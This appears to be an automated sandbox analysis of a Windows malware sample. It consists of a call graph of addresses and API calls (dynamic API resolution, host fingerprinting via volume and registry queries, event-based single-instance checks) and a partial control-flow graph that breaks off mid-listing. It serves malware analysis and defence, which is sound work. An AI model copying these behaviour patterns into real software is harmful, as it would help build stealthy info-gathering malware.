403b11 22 API calls 23586->23587 23588 40250d 23587->23588 23589 403b11 22 API calls 23588->23589 23590 402523 23589->23590 23591 403b11 22 API calls 23590->23591 23592 40253a 23591->23592 23593 403b11 22 API calls 23592->23593 23594 402550 23593->23594 23595 403b11 22 API calls 23594->23595 23596 402567 23595->23596 23597 403b11 22 API calls 23596->23597 23598 40257d 23597->23598 23599 403b11 22 API calls 23598->23599 23600 402594 23599->23600 23601 403b11 22 API calls 23600->23601 23602 4025aa 23601->23602 23603 403b11 22 API calls 23602->23603 23604 4025c1 23603->23604 23605 403b11 22 API calls 23604->23605 23606 4025d7 23605->23606 23607 403b11 22 API calls 23606->23607 23608 4025ed 23607->23608 23609 403b11 22 API calls 23608->23609 23610 402603 23609->23610 23611 403b11 22 API calls 23610->23611 23612 402619 23611->23612 23613 403b11 22 API calls 23612->23613 23614 40262f 23613->23614 23615 403b11 22 API calls 23614->23615 23616 402646 23615->23616 23617 403b11 22 API calls 23616->23617 23618 40265c 23617->23618 23619 403b11 22 API calls 23618->23619 23620 402673 23619->23620 23621 403b11 22 API calls 23620->23621 23622 402689 23621->23622 23623 403b11 22 API calls 23622->23623 23624 4026a0 23623->23624 23625 403b11 22 API calls 23624->23625 23626 4026b6 23625->23626 23627 403b11 22 API calls 23626->23627 23628 4026cc 23627->23628 23629 403b11 22 API calls 23628->23629 23630 4026e2 23629->23630 23631 403b11 22 API calls 23630->23631 23632 4026f9 23631->23632 23633 403b11 22 API calls 23632->23633 23634 40270f 23633->23634 23635 403b11 22 API calls 23634->23635 23636 402726 23635->23636 23637 403b11 22 API calls 23636->23637 23638 40273c 23637->23638 23639 403b11 22 API calls 23638->23639 23640 402753 23639->23640 23641 403b11 22 API calls 23640->23641 23642 402769 23641->23642 23643 403b11 22 API calls 23642->23643 23644 40277f 23643->23644 23645 403b11 22 API calls 23644->23645 23646 402795 23645->23646 23647 403b11 22 API calls 23646->23647 23648 4027ac 
23647->23648 23649 403b11 22 API calls 23648->23649 23650 4027c2 23649->23650 23651 403b11 22 API calls 23650->23651 23652 4027d9 23651->23652 23653 403b11 22 API calls 23652->23653 23654 4027ef 23653->23654 23655 403b11 22 API calls 23654->23655 23656 402806 23655->23656 23657 403b11 22 API calls 23656->23657 23658 40281c 23657->23658 23659 403b11 22 API calls 23658->23659 23660 402832 23659->23660 23661 403b11 22 API calls 23660->23661 23662 402848 23661->23662 23663 403b11 22 API calls 23662->23663 23664 40285e 23663->23664 23665 403b11 22 API calls 23664->23665 23666 402874 23665->23666 23667 403b11 22 API calls 23666->23667 23668 40288b 23667->23668 23669 403b11 22 API calls 23668->23669 23670 4028a1 23669->23670 23671 403b11 22 API calls 23670->23671 23672 4028b8 23671->23672 23673 403b11 22 API calls 23672->23673 23674 4028ce 23673->23674 23675 403b11 22 API calls 23674->23675 23676 4028e5 23675->23676 23677 403b11 22 API calls 23676->23677 23678 4028fb 23677->23678 23679 403b11 22 API calls 23678->23679 23680 402911 23679->23680 23681 403b11 22 API calls 23680->23681 23682 402927 23681->23682 23683 403b11 22 API calls 23682->23683 23684 40293d 23683->23684 23685 403b11 22 API calls 23684->23685 23686 402954 23685->23686 23687 403b11 22 API calls 23686->23687 23688 40296a 23687->23688 23689 403b11 22 API calls 23688->23689 23690 402981 23689->23690 23691 403b11 22 API calls 23690->23691 23692 402997 23691->23692 23693 403b11 22 API calls 23692->23693 23694 4029ae 23693->23694 23695 403b11 22 API calls 23694->23695 23696 4029c4 23695->23696 23697 403b11 22 API calls 23696->23697 23698 4029da 23697->23698 23699 403b11 22 API calls 23698->23699 23700 4029f0 23699->23700 23701 403b11 22 API calls 23700->23701 23702 402a07 23701->23702 23703 403b11 22 API calls 23702->23703 23704 402a1d 23703->23704 23705 403b11 22 API calls 23704->23705 23706 402a34 23705->23706 23707 403b11 22 API calls 23706->23707 23708 402a4a 23707->23708 23709 403b11 22 API calls 
23708->23709 23710 402a60 23709->23710 23711 403b11 22 API calls 23710->23711 23712 402a76 23711->23712 23713 403b11 22 API calls 23712->23713 23714 402a8d 23713->23714 23715 403b11 22 API calls 23714->23715 23716 402aa3 23715->23716 23717 403b11 22 API calls 23716->23717 23718 402ab9 23717->23718 23719 403b11 22 API calls 23718->23719 23720 402acf 23719->23720 23721 403b11 22 API calls 23720->23721 23722 402ae6 23721->23722 23723 403b11 22 API calls 23722->23723 23724 402afc 23723->23724 23725 403b11 22 API calls 23724->23725 23726 402b13 23725->23726 23727 403b11 22 API calls 23726->23727 23728 402b29 23727->23728 23729 403b11 22 API calls 23728->23729 23730 402b40 23729->23730 23731 403b11 22 API calls 23730->23731 23732 402b56 23731->23732 23733 403b11 22 API calls 23732->23733 23734 402b6d 23733->23734 23735 403b11 22 API calls 23734->23735 23736 402b83 23735->23736 23737 403b11 22 API calls 23736->23737 23738 402b99 23737->23738 23739 403b11 22 API calls 23738->23739 23740 402baf 23739->23740 23741 403b11 22 API calls 23740->23741 23742 402bc6 23741->23742 23743 403b11 22 API calls 23742->23743 23744 402bdc 23743->23744 23745 403b11 22 API calls 23744->23745 23746 402bf3 23745->23746 23747 403b11 22 API calls 23746->23747 23748 402c09 23747->23748 23749 403b11 22 API calls 23748->23749 23750 402c20 23749->23750 23751 403b11 22 API calls 23750->23751 23752 402c37 23751->23752 23753 403b11 22 API calls 23752->23753 23754 402c4e 23753->23754 23755 403b11 22 API calls 23754->23755 23756 402c65 23755->23756 23757 403b11 22 API calls 23756->23757 23758 402c7c 23757->23758 23759 403b11 22 API calls 23758->23759 23760 402c92 23759->23760 23761 403b11 22 API calls 23760->23761 23762 402ca9 23761->23762 23763 403b11 22 API calls 23762->23763 23764 402cc0 23763->23764 23765 403b11 22 API calls 23764->23765 23766 402cd7 23765->23766 23767 403b11 22 API calls 23766->23767 23768 402ced 23767->23768 23769 403b11 22 API calls 23768->23769 23770 402d04 23769->23770 23771 
403b11 22 API calls 23770->23771 23772 402d1b 23771->23772 23773 403b11 22 API calls 23772->23773 23774 402d31 23773->23774 23775 403b11 22 API calls 23774->23775 23776 402d48 23775->23776 23777 403b11 22 API calls 23776->23777 23778 402d5f 23777->23778 23779 403b11 22 API calls 23778->23779 23780 402d75 23779->23780 23781 403b11 22 API calls 23780->23781 23782 402d8c 23781->23782 23783 403b11 22 API calls 23782->23783 23784 402da3 23783->23784 23785 403b11 22 API calls 23784->23785 23786 402dba 23785->23786 23787 403b11 22 API calls 23786->23787 23788 402dd1 23787->23788 23789 403b11 22 API calls 23788->23789 23790 402de7 23789->23790 23791 403b11 22 API calls 23790->23791 23792 402dfe 23791->23792 23793 403b11 22 API calls 23792->23793 23794 402e14 23793->23794 23795 403b11 22 API calls 23794->23795 23796 402e2b 23795->23796 23797 403b11 22 API calls 23796->23797 23798 402e42 23797->23798 23799 403b11 22 API calls 23798->23799 23800 402e59 23799->23800 23801 403b11 22 API calls 23800->23801 23802 402e6f 23801->23802 23803 403b11 22 API calls 23802->23803 23804 402e85 23803->23804 23805 403b11 22 API calls 23804->23805 23806 402e9b 23805->23806 23807 403b11 22 API calls 23806->23807 23808 402eb2 23807->23808 23809 403b11 22 API calls 23808->23809 23810 402ec8 23809->23810 23811 403b11 22 API calls 23810->23811 23812 402edf 23811->23812 23813 403b11 22 API calls 23812->23813 23814 402ef6 23813->23814 23815 403b11 22 API calls 23814->23815 23816 402f0c 23815->23816 23817 403b11 22 API calls 23816->23817 23818 402f23 23817->23818 23819 403b11 22 API calls 23818->23819 23820 402f3a 23819->23820 23821 403b11 22 API calls 23820->23821 23822 402f50 23821->23822 23823 403b11 22 API calls 23822->23823 23824 402f66 23823->23824 23825 403b11 22 API calls 23824->23825 23826 402f7d 23825->23826 23827 403b11 22 API calls 23826->23827 23828 402f94 23827->23828 23829 403b11 22 API calls 23828->23829 23830 402fab 23829->23830 23831 403b11 22 API calls 23830->23831 23832 402fc2 
23831->23832 23833 403b11 22 API calls 23832->23833 23834 402fd9 23833->23834 23835 403b11 22 API calls 23834->23835 23836 402fef 23835->23836 23837 403b11 22 API calls 23836->23837 23838 403005 23837->23838 23839 403b11 22 API calls 23838->23839 23840 40301c 23839->23840 23841 403b11 22 API calls 23840->23841 23842 403032 23841->23842 23843 403b11 22 API calls 23842->23843 23844 403048 23843->23844 23845 403b11 22 API calls 23844->23845 23846 40305f 23845->23846 23847 403b11 22 API calls 23846->23847 23848 403076 23847->23848 23849 403b11 22 API calls 23848->23849 23850 40308d 23849->23850 23851 403b11 22 API calls 23850->23851 23852 4030a3 23851->23852 23853 403b11 22 API calls 23852->23853 23854 4030ba 23853->23854 23855 403b11 22 API calls 23854->23855 23856 4030d0 23855->23856 23857 403b11 22 API calls 23856->23857 23858 4030e7 23857->23858 23859 403b11 22 API calls 23858->23859 23860 4030fe 23859->23860 23861 403b11 22 API calls 23860->23861 23862 403115 23861->23862 23863 403b11 22 API calls 23862->23863 23864 40312b 23863->23864 23865 403b11 22 API calls 23864->23865 23866 403142 23865->23866 23867 403b11 22 API calls 23866->23867 23868 403159 23867->23868 23869 403b11 22 API calls 23868->23869 23870 403170 23869->23870 23871 403b11 22 API calls 23870->23871 23872 403187 23871->23872 23873 403b11 22 API calls 23872->23873 23874 40319d 23873->23874 23875 403b11 22 API calls 23874->23875 23876 4031b4 23875->23876 23877 403b11 22 API calls 23876->23877 23878 4031cb 23877->23878 23879 403b11 22 API calls 23878->23879 23880 4031e2 23879->23880 23881 403b11 22 API calls 23880->23881 23882 4031f9 23881->23882 23883 403b11 22 API calls 23882->23883 23884 403210 23883->23884 23885 403b11 22 API calls 23884->23885 23886 403227 23885->23886 23887 403b11 22 API calls 23886->23887 23888 40323e 23887->23888 23889 403b11 22 API calls 23888->23889 23890 403255 23889->23890 23891 403b11 22 API calls 23890->23891 23892 40326c 23891->23892 23893 403b11 22 API calls 
23892->23893 23894 403283 23893->23894 23895 403b11 22 API calls 23894->23895 23896 403299 23895->23896 23897 403b11 22 API calls 23896->23897 23898 4032af 23897->23898 23899 403b11 22 API calls 23898->23899 23900 4032c6 23899->23900 23901 403b11 22 API calls 23900->23901 23902 4032dd 23901->23902 23903 403b11 22 API calls 23902->23903 23904 4032f3 23903->23904 23905 403b11 22 API calls 23904->23905 23906 403309 23905->23906 23907 403b11 22 API calls 23906->23907 23908 40331f 23907->23908 23909 403b11 22 API calls 23908->23909 23910 403335 23909->23910 23911 403b11 22 API calls 23910->23911 23912 40334c 23911->23912 23913 403b11 22 API calls 23912->23913 23914 403362 23913->23914 23915 403b11 22 API calls 23914->23915 23916 403379 23915->23916 23917 403b11 22 API calls 23916->23917 23918 403390 23917->23918 23919 403b11 22 API calls 23918->23919 23920 4033a6 23919->23920 23921 403b11 22 API calls 23920->23921 23922 4033bc 23921->23922 23923 403b11 22 API calls 23922->23923 23924 4033d2 23923->23924 23925 403b11 22 API calls 23924->23925 23926 4033e9 23925->23926 23927 403b11 22 API calls 23926->23927 23928 403400 23927->23928 23929 403b11 22 API calls 23928->23929 23930 403417 23929->23930 23931 403b11 22 API calls 23930->23931 23932 40342e 23931->23932 23933 403b11 22 API calls 23932->23933 23934 403444 23933->23934 23935 403b11 22 API calls 23934->23935 23936 40345a 23935->23936 23937 403b11 22 API calls 23936->23937 23938 403470 23937->23938 23939 403b11 22 API calls 23938->23939 23940 403487 23939->23940 23941 403b11 22 API calls 23940->23941 23942 40349e 23941->23942 23943 403b11 22 API calls 23942->23943 23944 4034b5 23943->23944 23945 403b11 22 API calls 23944->23945 23946 4034cb 23945->23946 23947 403b11 22 API calls 23946->23947 23948 4034e1 23947->23948 23949 403b11 22 API calls 23948->23949 23950 4034f8 23949->23950 23951 403b11 22 API calls 23950->23951 23952 40350f 23951->23952 23953 403b11 22 API calls 23952->23953 23954 403526 23953->23954 23955 
403b11 22 API calls 23954->23955 23956 40353d 23955->23956 23957 403b11 22 API calls 23956->23957 23958 403553 23957->23958 23959 403b11 22 API calls 23958->23959 23960 40356a 23959->23960 23961 403b11 22 API calls 23960->23961 23962 403581 23961->23962 23963 403b11 22 API calls 23962->23963 23964 403598 23963->23964 23965 403b11 22 API calls 23964->23965 23966 4035ae 23965->23966 23967 403b11 22 API calls 23966->23967 23968 4035c5 23967->23968 23969 403b11 22 API calls 23968->23969 23970 4035dc 23969->23970 23971 403b11 22 API calls 23970->23971 23972 4035f3 23971->23972 23973 403b11 22 API calls 23972->23973 23974 40360a 23973->23974 23975 403b11 22 API calls 23974->23975 23976 403621 23975->23976 23977 403b11 22 API calls 23976->23977 23978 403638 23977->23978 23979 403b11 22 API calls 23978->23979 23980 40364f 23979->23980 23981 403b11 22 API calls 23980->23981 23982 403666 23981->23982 23983 403b11 22 API calls 23982->23983 23984 40367d 23983->23984 23985 403b11 22 API calls 23984->23985 23986 403693 23985->23986 23987 403b11 22 API calls 23986->23987 23988 4036aa 23987->23988 23989 403b11 22 API calls 23988->23989 23990 4036c1 23989->23990 23991 403b11 22 API calls 23990->23991 23992 4036d8 23991->23992 23993 403b11 22 API calls 23992->23993 23994 4036ee 23993->23994 23995 403b11 22 API calls 23994->23995 23996 403705 23995->23996 23997 403b11 22 API calls 23996->23997 23998 40371c 23997->23998 23999 403b11 22 API calls 23998->23999 24000 403733 23999->24000 24001 403b11 22 API calls 24000->24001 24002 40374a 24001->24002 24003 403b11 22 API calls 24002->24003 24004 403761 24003->24004 24005 403b11 22 API calls 24004->24005 24006 403778 24005->24006 24007 403b11 22 API calls 24006->24007 24008 40378e 24007->24008 24009 403b11 22 API calls 24008->24009 24010 4037a5 24009->24010 24011 403b11 22 API calls 24010->24011 24012 4037bc 24011->24012 24013 403b11 22 API calls 24012->24013 24014 4037d3 24013->24014 24015 403b11 22 API calls 24014->24015 24016 4037ec 
24015->24016 24017 403b11 22 API calls 24016->24017 24018 403802 24017->24018 24019 403b11 22 API calls 24018->24019 24020 403818 24019->24020 24021 403b11 22 API calls 24020->24021 24022 40382e 24021->24022 24023 403b11 22 API calls 24022->24023 24024 403845 24023->24024 24025 403b11 22 API calls 24024->24025 24026 40385b 24025->24026 24027 403b11 22 API calls 24026->24027 24028 403872 24027->24028 24029 403b11 22 API calls 24028->24029 24030 403889 24029->24030 24031 403b11 22 API calls 24030->24031 24032 4038a0 24031->24032 24033 403b11 22 API calls 24032->24033 24034 4038b7 24033->24034 24035 403b11 22 API calls 24034->24035 24036 4038ce 24035->24036 24037 403b11 22 API calls 24036->24037 24038 4038e5 24037->24038 24039 403b11 22 API calls 24038->24039 24040 4038fc 24039->24040 24041 403b11 22 API calls 24040->24041 24042 403913 24041->24042 24043 403b11 22 API calls 24042->24043 24044 40392a 24043->24044 24045 403b11 22 API calls 24044->24045 24046 403941 24045->24046 24047 403b11 22 API calls 24046->24047 24048 403957 24047->24048 24049 403b11 22 API calls 24048->24049 24050 40396e 24049->24050 24051 403b11 22 API calls 24050->24051 24052 403984 24051->24052 24053 403b11 22 API calls 24052->24053 24054 40399a 24053->24054 24055 403b11 22 API calls 24054->24055 24056 4039b1 24055->24056 24057 403b11 22 API calls 24056->24057 24058 4039c8 24057->24058 24059 403b11 22 API calls 24058->24059 24060 4039df 24059->24060 24061 403b11 22 API calls 24060->24061 24062 4039f6 24061->24062 24063 403b11 22 API calls 24062->24063 24064 403a0d 24063->24064 24065 403b11 22 API calls 24064->24065 24066 403a26 24065->24066 24067 403b11 22 API calls 24066->24067 24068 403a3d 24067->24068 24069 403b11 22 API calls 24068->24069 24070 403a53 24069->24070 24071 403b11 22 API calls 24070->24071 24072 403a69 24071->24072 24073 403b11 22 API calls 24072->24073 24074 403a7f 24073->24074 24075 403b11 22 API calls 24074->24075 24076 403a95 24075->24076 24077 403b11 22 API calls 
24076->24077 24078 403aac 24077->24078 24079 403b11 22 API calls 24078->24079 24080 403ac3 24079->24080 24081 403b11 22 API calls 24080->24081 24082 403ada 24081->24082 24083 403b11 22 API calls 24082->24083 24084 403af0 24083->24084 24085 403b11 22 API calls 24084->24085 24086 403b07 24085->24086 24087 418b05 24086->24087 24088 418b12 59 API calls 24087->24088 24089 41905a 11 API calls 24087->24089 24088->24089 24090 419122 6 API calls 24089->24090 24091 4191a7 24089->24091 24090->24091 24092 4191f0 24091->24092 24093 4191b0 GetProcAddress GetProcAddress GetProcAddress 24091->24093 24094 419351 24092->24094 24095 4191fd 15 API calls 24092->24095 24093->24092 24096 419484 24094->24096 24097 41935e 13 API calls 24094->24097 24095->24094 24098 419491 7 API calls 24096->24098 24099 41952d 24096->24099 24097->24096 24098->24099 24100 4195a4 24099->24100 24101 419536 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 24099->24101 24102 4195b1 11 API calls 24100->24102 24103 4196a9 24100->24103 24101->24100 24102->24103 24104 4196f2 24103->24104 24105 4196b2 GetProcAddress GetProcAddress GetProcAddress 24103->24105 24106 41973b 24104->24106 24107 4196fb GetProcAddress GetProcAddress GetProcAddress 24104->24107 24105->24104 24108 419748 6 API calls 24106->24108 24109 4197cd 24106->24109 24107->24106 24108->24109 24110 4197d6 GetProcAddress 24109->24110 24111 4197e8 24109->24111 24110->24111 24112 4197f5 8 API calls 24111->24112 24113 40b84f 24111->24113 24112->24113 24114 414c66 24113->24114 24182 42083e 24114->24182 24116 414c75 GetWindowsDirectoryA 24117 414cc2 GetVolumeInformationA 24116->24117 24118 414cbb 24116->24118 24119 414d29 24117->24119 24118->24117 24119->24119 24120 414d3e GetProcessHeap HeapAlloc 24119->24120 24121 414d82 wsprintfA 24120->24121 24122 414d59 24120->24122 24183 40c297 24121->24183 24202 404331 24122->24202 24125 414f07 24126 414e06 24129 415326 78 API calls 24126->24129 24127 414db2 24127->24125 24127->24126 24206 
41fcbb 85 API calls __tolower_l 24127->24206 24131 414e11 24129->24131 24130 40b87d lstrcatA 24130->23067 24187 40c034 24131->24187 24137 40c034 77 API calls 24138 414e49 24137->24138 24207 415bad 77 API calls 24138->24207 24140 414e61 24208 4046ce 77 API calls 24140->24208 24142 414d6d ctype 24199 420888 24142->24199 24144 41535e 24143->24144 24145 404331 numpunct 77 API calls 24144->24145 24146 41536e 24145->24146 24147 41da9b setSBUpLow 5 API calls 24146->24147 24148 40b8bb lstrcatA 24147->24148 24148->23071 24280 42083e 24149->24280 24151 414f1a GetSystemInfo 24281 415f45 24151->24281 24155 414f47 ctype 24156 420888 ctype 5 API calls 24155->24156 24157 40b8f9 lstrcatA 24156->24157 24157->23075 24159 404331 numpunct 77 API calls 24158->24159 24160 4083b1 lstrcatA 24159->24160 24160->23103 24162 404331 numpunct 77 API calls 24161->24162 24163 4083f7 24162->24163 24163->23103 24165 404331 numpunct 77 API calls 24164->24165 24166 40841a 24165->24166 24166->23103 24167->23090 24168->23097 24169->23101 24170->23107 24171->23109 24172->23111 24173->23112 24174->23115 24175->23116 24176->23118 24177->23120 24178->23123 24179->23138 24180->23138 24181->23141 24182->24116 24184 40c29e 24183->24184 24184->24184 24209 40c2e9 24184->24209 24186 40c2b7 24186->24127 24257 40440a 24187->24257 24189 40c059 24190 41537d 24189->24190 24271 426300 24190->24271 24192 4153bd RegOpenKeyExA 24193 4153f9 RegCloseKey CharToOemA 24192->24193 24194 4153de RegQueryValueExA 24192->24194 24195 404331 numpunct 77 API calls 24193->24195 24194->24193 24196 41542a 24195->24196 24197 41da9b setSBUpLow 5 API calls 24196->24197 24198 414e36 24197->24198 24198->24137 24200 41da9b setSBUpLow 5 API calls 24199->24200 24201 420892 24200->24201 24201->24201 24203 40433b 24202->24203 24203->24203 24273 404396 24203->24273 24205 404350 24205->24142 24206->24127 24207->24140 24208->24142 24210 40c2f9 numpunct 24209->24210 24211 40c2fd 24210->24211 24212 40c316 24210->24212 24218 404799 77 API calls 3 
library calls 24211->24218 24213 40c32c 24212->24213 24219 41cfa0 67 API calls 2 library calls 24212->24219 24217 40c314 _memmove 24213->24217 24220 4044a3 24213->24220 24217->24186 24218->24217 24219->24213 24221 4044ad 24220->24221 24223 4044b7 24220->24223 24230 41cfa0 67 API calls 2 library calls 24221->24230 24225 4044c7 ctype 24223->24225 24226 4045b4 24223->24226 24225->24217 24227 4045c0 __EH_prolog3_catch 24226->24227 24231 404719 24227->24231 24229 40460b std::locale::_Locimp::_Locimp_dtor ctype _memmove 24229->24225 24230->24223 24232 404726 24231->24232 24233 40475e 24231->24233 24234 404734 24232->24234 24239 41e24d 24232->24239 24233->24229 24234->24233 24251 41dc00 66 API calls std::exception::_Copy_str 24234->24251 24237 404749 24252 41ff86 RaiseException 24237->24252 24242 41e257 24239->24242 24240 41dae4 _malloc 66 API calls 24240->24242 24241 41e271 24241->24234 24242->24240 24242->24241 24246 41e273 std::exception::exception 24242->24246 24253 4235e2 DecodePointer 24242->24253 24244 41e2b1 24255 41dc85 66 API calls std::exception::operator= 24244->24255 24246->24244 24254 41ed20 76 API calls __cinit 24246->24254 24247 41e2bb 24256 41ff86 RaiseException 24247->24256 24250 41e2cc 24251->24237 24252->24233 24253->24242 24254->24244 24255->24247 24256->24250 24258 404429 24257->24258 24259 40441f 24257->24259 24261 404453 24258->24261 24262 404439 24258->24262 24268 41cfed 67 API calls 2 library calls 24259->24268 24264 4044a3 numpunct 77 API calls 24261->24264 24269 40453e 67 API calls 2 library calls 24262->24269 24267 404451 _memmove 24264->24267 24265 404445 24270 40453e 67 API calls 2 library calls 24265->24270 24267->24189 24268->24258 24269->24265 24270->24267 24272 42630c 24271->24272 24272->24192 24272->24272 24274 4043a4 numpunct 24273->24274 24275 4043c5 24274->24275 24276 4043a8 24274->24276 24277 4044a3 numpunct 77 API calls 24275->24277 24278 40440a numpunct 77 API calls 24276->24278 24279 4043c3 _memmove 24277->24279 24278->24279 
24279->24205 24280->24151 24282 415f54 __EH_prolog3_GS 24281->24282 24298 414325 24282->24298 24284 415fa8 24302 417359 24284->24302 24286 415ff8 24306 416879 24286->24306 24288 41600e 24320 416c31 24288->24320 24290 41601d ctype 24323 41d1c9 24290->24323 24292 416057 24293 420888 ctype 5 API calls 24292->24293 24294 414f33 24293->24294 24295 4042a9 24294->24295 24296 404331 numpunct 77 API calls 24295->24296 24297 4042c3 24296->24297 24297->24155 24299 414331 __EH_prolog3 24298->24299 24327 41462b 24299->24327 24301 41435a std::locale::_Locimp::_Locimp_dtor 24301->24284 24303 417365 __EH_prolog3 24302->24303 24435 4146a9 24303->24435 24305 417371 std::locale::_Locimp::_Locimp_dtor 24305->24286 24307 416885 __EH_prolog3_catch 24306->24307 24451 417477 24307->24451 24309 416896 24310 40e367 2 API calls 24309->24310 24319 4168c6 24309->24319 24314 4168b1 24310->24314 24311 416940 24455 4174d3 24311->24455 24459 418678 114 API calls 7 library calls 24314->24459 24315 41694d std::locale::_Locimp::_Locimp_dtor 24315->24288 24317 4168bb 24318 40e0fe std::ios_base::_Ios_base_dtor 2 API calls 24317->24318 24318->24319 24319->24311 24460 413809 67 API calls 24319->24460 24463 4173aa 24320->24463 24324 41d1d8 std::ios_base::_Tidy 24323->24324 24325 40e0fe std::ios_base::_Ios_base_dtor 2 API calls 24324->24325 24326 41d1fd ctype 24324->24326 24325->24326 24326->24292 24328 41e24d std::_Mutex::_Mutex 77 API calls 24327->24328 24329 41465f 24328->24329 24330 414679 24329->24330 24338 41d4d4 24329->24338 24354 414754 24330->24354 24332 41466b 24362 40e094 24332->24362 24334 414692 24335 4146a4 24334->24335 24367 413809 67 API calls 24334->24367 24335->24301 24339 41d4e0 __EH_prolog3 24338->24339 24340 41d55b std::locale::_Locimp::_Locimp_dtor 24339->24340 24368 41d5bd 24339->24368 24340->24332 24344 41e24d std::_Mutex::_Mutex 77 API calls 24345 41d50b 24344->24345 24346 41d518 24345->24346 24376 41d431 66 API calls _Yarn 24345->24376 24372 41d299 24346->24372 24351 41d538 24352 
40e094 std::locale::facet::_Incref 2 API calls 24351->24352 24353 41d545 24352->24353 24378 41d5e5 24353->24378 24355 414760 __EH_prolog3 24354->24355 24399 40e367 24355->24399 24359 414775 24420 40e0fe 24359->24420 24361 414784 std::locale::_Locimp::_Locimp_dtor 24361->24334 24363 41d5bd std::_Lockit::_Lockit EnterCriticalSection 24362->24363 24364 40e0a5 24363->24364 24365 41d5e5 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 24364->24365 24366 40e0b9 24365->24366 24366->24330 24367->24335 24369 41d5cf 24368->24369 24371 41d4f6 24368->24371 24382 41da28 EnterCriticalSection 24369->24382 24371->24344 24371->24353 24373 41d2a7 24372->24373 24374 41d2b8 24372->24374 24383 41d9ab 24373->24383 24377 41d38c 66 API calls 3 library calls 24374->24377 24376->24346 24377->24351 24379 41d5fa 24378->24379 24380 41d5ec 24378->24380 24379->24340 24398 41da38 LeaveCriticalSection 24380->24398 24382->24371 24384 41d9b9 24383->24384 24385 41d9bf RtlEncodePointer 24383->24385 24394 42d1ae DecodePointer 24384->24394 24385->24374 24387 422e83 24388 422e8e 24387->24388 24395 42d1bb 67 API calls 8 library calls 24387->24395 24390 422ea6 24388->24390 24396 423890 8 API calls 3 library calls 24388->24396 24397 423373 66 API calls _doexit 24390->24397 24393 422eb0 24394->24387 24395->24388 24396->24390 24397->24393 24398->24379 24400 40e094 std::locale::facet::_Incref 2 API calls 24399->24400 24401 40e373 24400->24401 24402 4148dc 24401->24402 24403 4148e8 __EH_prolog3 24402->24403 24404 41d5bd std::_Lockit::_Lockit EnterCriticalSection 24403->24404 24405 4148f2 24404->24405 24424 40e063 24405->24424 24407 41491d 24409 41d5e5 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 24407->24409 24408 414909 24408->24407 24430 40e14b 114 API calls 4 library calls 24408->24430 24410 414972 std::locale::_Locimp::_Locimp_dtor 24409->24410 24410->24359 24412 41492d 24413 41494f 24412->24413 24431 41dc67 66 API calls std::exception::exception 24412->24431 24415 40e094 
std::locale::facet::_Incref 2 API calls 24413->24415 24417 41495f 24415->24417 24416 414941 24432 41ff86 RaiseException 24416->24432 24433 41d21c 77 API calls std::_Mutex::_Mutex 24417->24433 24421 40e104 24420->24421 24422 40e109 24420->24422 24434 40e0bc EnterCriticalSection LeaveCriticalSection std::locale::_Locimp::_Locimp_dtor std::_Lockit::_Lockit 24421->24434 24422->24361 24425 40e090 24424->24425 24426 40e06c 24424->24426 24425->24408 24427 41d5bd std::_Lockit::_Lockit EnterCriticalSection 24426->24427 24428 40e076 24427->24428 24429 41d5e5 std::locale::_Locimp::_Locimp_dtor LeaveCriticalSection 24428->24429 24429->24425 24430->24412 24431->24416 24432->24413 24433->24407 24434->24422 24436 4146b5 __EH_prolog3 24435->24436 24445 41d5fc 24436->24445 24439 41e24d std::_Mutex::_Mutex 77 API calls 24440 4146d1 24439->24440 24441 41d4d4 std::locale::_Init 82 API calls 24440->24441 24443 4146eb std::locale::_Locimp::_Locimp_dtor ctype 24440->24443 24442 4146dd 24441->24442 24444 40e094 std::locale::facet::_Incref 2 API calls 24442->24444 24443->24305 24444->24443 24446 41e24d std::_Mutex::_Mutex 77 API calls 24445->24446 24447 41d608 24446->24447 24450 41da08 InitializeCriticalSection 24447->24450 24449 4146c6 24449->24439 24450->24449 24452 417483 __EH_prolog3 24451->24452 24453 4174b9 std::locale::_Locimp::_Locimp_dtor 24452->24453 24461 4137ca 67 API calls 24452->24461 24453->24309 24456 4174df __EH_prolog3 24455->24456 24458 4174f6 std::locale::_Locimp::_Locimp_dtor 24456->24458 24462 417cf2 67 API calls 2 library calls 24456->24462 24458->24315 24459->24317 24460->24311 24461->24453 24462->24458 24464 4173b6 __EH_prolog3_GS 24463->24464 24465 4173cb 24464->24465 24466 41740a 24464->24466 24467 404396 numpunct 77 API calls 24465->24467 24468 404396 numpunct 77 API calls 24466->24468 24469 4173f3 ctype 24466->24469 24467->24469 24468->24469 24470 420888 ctype 5 API calls 24469->24470 24471 416c44 24470->24471 24471->24290

Control-flow Graph

• Executed
• Not Executed
                                                                    control_flow_graph 42 40b7ec-40b864 call 40121a call 418b05 47 40b86b-40b86f 42->47 47->47 48 40b871-40b889 call 414c66 47->48 51 40b88b 48->51 52 40b88d-40b8c7 lstrcatA call 404354 call 415326 48->52 51->52 57 40b8c9 52->57 58 40b8cb-40b905 lstrcatA call 404354 call 414f0e 52->58 57->58 63 40b907 58->63 64 40b909-40b933 lstrcatA call 404354 58->64 63->64 67 40b947-40b95e OpenEventA 64->67 68 40b960-40b97b CreateEventA 67->68 69 40b935-40b941 CloseHandle Sleep 67->69 70 40b982-40b986 68->70 69->67 70->70 71 40b988-40b9b3 lstrcatA call 408392 70->71 74 40b9b5 71->74 75 40b9b7-40b9dc lstrcatA call 404354 71->75 74->75 78 40b9e1-40ba25 call 4083d8 call 40841e call 40a9fd 75->78 85 40ba27 78->85 86 40ba29-40ba37 StrCmpCA 78->86 85->86 87 40ba81-40ba8d 86->87 88 40ba39-40ba7e call 404331 call 404778 call 40ab1d 86->88 89 40ba91-40ba9f StrCmpCA 87->89 90 40ba8f 87->90 88->87 93 40bb75-40bb84 call 41cdbd 89->93 94 40baa5-40bae9 call 4083fb call 40841e call 40a9fd 89->94 90->89 103 40bb8b-40bb8f 93->103 113 40baeb 94->113 114 40baed-40bafb StrCmpCA 94->114 103->103 104 40bb91-40bb98 103->104 107 40bba0-40bc76 lstrcatA * 2 call 415ef6 lstrcatA * 2 call 40de3a call 408202 call 40ac0f call 4133b9 104->107 108 40bb9a 104->108 134 40bc78 call 40903e 107->134 135 40bc7d-40bc88 call 40afb3 107->135 108->107 113->114 115 40bb45-40bb51 114->115 116 40bafd-40bb42 call 404331 call 404778 call 40ab1d 114->116 120 40bb53 115->120 121 40bb55-40bb63 StrCmpCA 115->121 116->115 120->121 121->93 124 40bb65-40bb70 Sleep 121->124 124->78 134->135 139 40bc93-40bc99 135->139 140 40bc8a-40bc8e call 40cb83 135->140 142 40bca0-40bca6 139->142 143 